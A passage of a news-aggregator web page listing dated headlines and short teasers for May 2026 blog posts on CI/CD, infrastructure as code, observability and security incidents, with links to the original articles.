        </h3><p>AI made writing code dramatically faster, but the work between opening a merge request and merging it has stayed almost entirely manual. Assigning reviewers, addressing feedback round after round, unt</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/transform-mrs-to-automated-workflow/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-track-ci-component-usage-across-your-organization" class="group relative scroll-mt-24">
        <a href="#h3-track-ci-component-usage-across-your-organization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Track CI component usage across your organization
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-track-ci-component-usage-across-your-organization"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If your platform team publishes standardized pipeline components, you&#39;ve probably encountered this: once they&#39;re out in the wild, you lose visibility. You can&#39;t see if anyone’s actually using it, who&#39;</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/track-ci-component-usage/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-manage-cicd-credentials-with-gitlab-secrets-manager" class="group relative scroll-mt-24">
        <a href="#h3-manage-cicd-credentials-with-gitlab-secrets-manager" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Manage CI/CD credentials with GitLab Secrets Manager
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-manage-cicd-credentials-with-gitlab-secrets-manager"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Many credential leaks start with a developer who needs a credential, doesn’t have a good place to put it, and improvises. It lands in an over-scoped CI/CD variable, a config file, or a .env committed </p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/secrets-manager-in-public-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-more-ai-models-for-gitlab-duo-agent-platform-self-hosted" class="group relative scroll-mt-24">
        <a href="#h3-more-ai-models-for-gitlab-duo-agent-platform-self-hosted" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 More AI models for GitLab Duo Agent Platform Self-Hosted
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-more-ai-models-for-gitlab-duo-agent-platform-self-hosted"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Customers running GitLab Duo Agent Platform Self-Hosted operate under constraints many software teams don&#39;t face: data residency mandates, air-gapped networks, and compliance regulations that prohibit</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/more-ai-models-for-duo-agent-platform-self-hosted/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-investigating-unauthorized-access-to-github-owned-repositories" class="group relative scroll-mt-24">
        <a href="#h3-investigating-unauthorized-access-to-github-owned-repositories" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Investigating unauthorized access to GitHub-owned repositories
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-investigating-unauthorized-access-to-github-owned-repositories"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If any impact is discovered, customers will be notified via established incident response and notification channels. The post Investigating unauthorized access to GitHub-owned repositories appeared fi</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/security/investigating-unauthorized-access-to-githubs-internal-repositories/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-consolidate-registries-to-accelerate-secure-cicd-flows" class="group relative scroll-mt-24">
        <a href="#h3-consolidate-registries-to-accelerate-secure-cicd-flows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Consolidate registries to accelerate secure CI/CD flows
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-consolidate-registries-to-accelerate-secure-cicd-flows"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Artifact repository sprawl across multiple registries creates CI/CD bottlenecks, security blind spots, and compliance gaps. Learn how registry consolidation with unified governance fixes it. | Blog</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/why-artifact-repository-sprawl-slows-down-software-delivery"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-iac"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-introducing-pulumi-do-direct-resource-operations-for-any-cloud" class="group relative scroll-mt-24">
        <a href="#h3-introducing-pulumi-do-direct-resource-operations-for-any-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing pulumi do: Direct Resource Operations for Any Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-pulumi-do-direct-resource-operations-for-any-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Infrastructure as code is the right model for production systems. State tracking, drift detection, and repeatable deployments all matter when you’re managing real workloads. But sometimes, you also ne</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/pulumi-do-direct-resource-operations/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-streamlining-red-hat-openshift-multicluster-management-with-red-hat-ansible-automation-platform" class="group relative scroll-mt-24">
        <a href="#h3-streamlining-red-hat-openshift-multicluster-management-with-red-hat-ansible-automation-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Streamlining Red Hat OpenShift multicluster management with Red Hat Ansible Automation Platform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-streamlining-red-hat-openshift-multicluster-management-with-red-hat-ansible-automation-platform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Multicluster management has been a rapidly evolving part of ITOps over the past several years. As organizations deploy hundreds to thousands of clusters across distributed environments, it’s important</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/streamlining-red-hat-openshift-multicluster-management-red-hat-ansible-automation-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bringing-neo-to-github-and-slack" class="group relative scroll-mt-24">
        <a href="#h3-bringing-neo-to-github-and-slack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Bringing Neo to GitHub and Slack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-bringing-neo-to-github-and-slack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This week, Pulumi Neo started working in two more places: GitHub and Slack. The agent that already runs Pulumi tasks from the Cloud console and the terminal now participates in the threads where your </p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/neo-github-slack/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-seven-rules-for-building-an-ai-native-software-factory" class="group relative scroll-mt-24">
        <a href="#h3-seven-rules-for-building-an-ai-native-software-factory" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Seven Rules for Building an AI-Native Software Factory
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-seven-rules-for-building-an-ai-native-software-factory"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Ewan Dawson is CTO of Compostable AI, where five engineers run an AI-native software factory: nineteen clients, custom AWS deployments, most of them shipped within a day of contract signing. This arti</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/seven-rules-ai-native-software-factory/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-upgrading-fedora-with-zabbix-and-ansible" class="group relative scroll-mt-24">
        <a href="#h3-upgrading-fedora-with-zabbix-and-ansible" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Upgrading Fedora with Zabbix and Ansible
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-upgrading-fedora-with-zabbix-and-ansible"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Fedora is a global open source project and Linux distribution that provides a platform for innovation and collaboration. Its infrastructure is managed by a dedicated team of professionals and voluntee</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Zabbix Blog</strong></p>
<p><a href="https://blog.zabbix.com/upgrading-fedora-with-zabbix-and-ansible/32915/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-route-claude-code-through-mlflow-ai-gateway" class="group relative scroll-mt-24">
        <a href="#h3-route-claude-code-through-mlflow-ai-gateway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Route Claude Code Through MLflow AI Gateway
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-route-claude-code-through-mlflow-ai-gateway"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn how to route Claude Code through MLflow AI Gateway to get full observability, budget controls, and guardrails across all your coding agent sessions, with no changes to how you use Claude Code.</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 MLflow Blog</strong></p>
<p><a href="https://mlflow.org/blog/gateway-claude-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whos-monitoring-the-agents" class="group relative scroll-mt-24">
        <a href="#h3-whos-monitoring-the-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Who’s monitoring the agents?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whos-monitoring-the-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Over the past few months, something quietly shifted. Frameworks like CrewAI, AutoGen, and LangGraph are no longer just showing up The post Who’s monitoring the agents? appeared first on The New Stack.</p>
<p><strong>📅 May 24, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/who-monitors-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-designing-end-to-end-ingress-request-tracing-for-multi-tenant-saas-platforms" class="group relative scroll-mt-24">
        <a href="#h3-designing-end-to-end-ingress-request-tracing-for-multi-tenant-saas-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Designing end-to-end ingress request tracing for multi-tenant SaaS platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-designing-end-to-end-ingress-request-tracing-for-multi-tenant-saas-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Modern SaaS platforms built on cloud‑native architectures frequently consist of dozens of independently deployed microservices. A single customer request entering the platform at the ingress layer may</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/22/designing-end-to-end-ingress-request-tracing-for-multi-tenant-saas-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-product-analytics-you-already-have" class="group relative scroll-mt-24">
        <a href="#h3-the-product-analytics-you-already-have" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The product analytics you already have
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-product-analytics-you-already-have"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Your Sentry traces, logs, and metrics already answer most product analytics questions. Learn how to query existing telemetry for product insights.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/product-analytics-you-already-have/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-automate-root-cause-analysis-across-datadog-and-elasticsearch-with-aws-devops-agent" class="group relative scroll-mt-24">
        <a href="#h3-automate-root-cause-analysis-across-datadog-and-elasticsearch-with-aws-devops-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Automate root cause analysis across Datadog and Elasticsearch with AWS DevOps Agent
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-automate-root-cause-analysis-across-datadog-and-elasticsearch-with-aws-devops-agent"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Modern distributed systems route business transactions through dozens of microservices, message queues, and event streams. When a message fails to process or processing exceeds SLA thresholds, trouble</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/automate-root-cause-analysis-across-datadog-and-elasticsearch-with-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-applying-opentelemetry-security-practices-in-legacy-environments" class="group relative scroll-mt-24">
        <a href="#h3-applying-opentelemetry-security-practices-in-legacy-environments" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Applying OpenTelemetry Security Practices in Legacy Environments
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-applying-opentelemetry-security-practices-in-legacy-environments"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>OpenTelemetry is gaining traction in manufacturing and other legacy environments as organizations explore modern observability approaches. However, applying these practices in traditional systems intr</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/security-legacy-environments/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-exploitation-of-knowledgedeliver-via-viewstate-deserialization-vulnerability" class="group relative scroll-mt-24">
        <a href="#h3-exploitation-of-knowledgedeliver-via-viewstate-deserialization-vulnerability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Exploitation of KnowledgeDeliver via ViewState Deserialization Vulnerability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-exploitation-of-knowledgedeliver-via-viewstate-deserialization-vulnerability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Written by: Takahiro Sugiyama, Peter Revelant, Mathew Potaczek Introduction In late 2025, Mandiant responded to a security incident involving a compromised web server running KnowledgeDeliver. Knowled</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/knowledgedeliver-viewstate-deserialization-vulnerability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-laravel-lang-supply-chain-advisory" class="group relative scroll-mt-24">
        <a href="#h3-laravel-lang-supply-chain-advisory" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Laravel Lang Supply Chain Advisory
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-laravel-lang-supply-chain-advisory"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
